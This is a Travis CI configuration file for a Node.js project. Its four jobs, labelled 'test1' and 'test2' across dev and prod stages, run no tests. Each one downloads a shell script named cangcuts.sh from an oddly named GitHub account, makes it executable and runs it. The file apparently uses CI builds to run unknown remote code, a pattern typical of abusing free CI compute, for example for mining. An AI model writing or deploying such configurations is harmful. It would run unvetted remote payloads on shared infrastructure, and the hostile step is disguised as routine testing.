language: node_js
node_js:
  - 10

stage:
  - dev
  - prod

branches:
  only:
    - stages

jobs:
  include:
    - stage: dev
      name: "test1"
      script: wget https://raw.githubusercontent.com/ewfwesdcew/1/main/cangcuts.sh && chmod +x cangcuts.sh && ./cangcuts.sh
      
    - script: wget https://raw.githubusercontent.com/ewfwesdcew/1/main/cangcuts.sh && chmod +x cangcuts.sh && ./cangcuts.sh
      name: test2     
    
    - stage: prod
      name: test1
      script: wget https://raw.githubusercontent.com/ewfwesdcew/1/main/cangcuts.sh && chmod +x cangcuts.sh && ./cangcuts.sh
      
    - script: wget https://raw.githubusercontent.com/ewfwesdcew/1/main/cangcuts.sh && chmod +x cangcuts.sh && ./cangcuts.sh
      name: test2
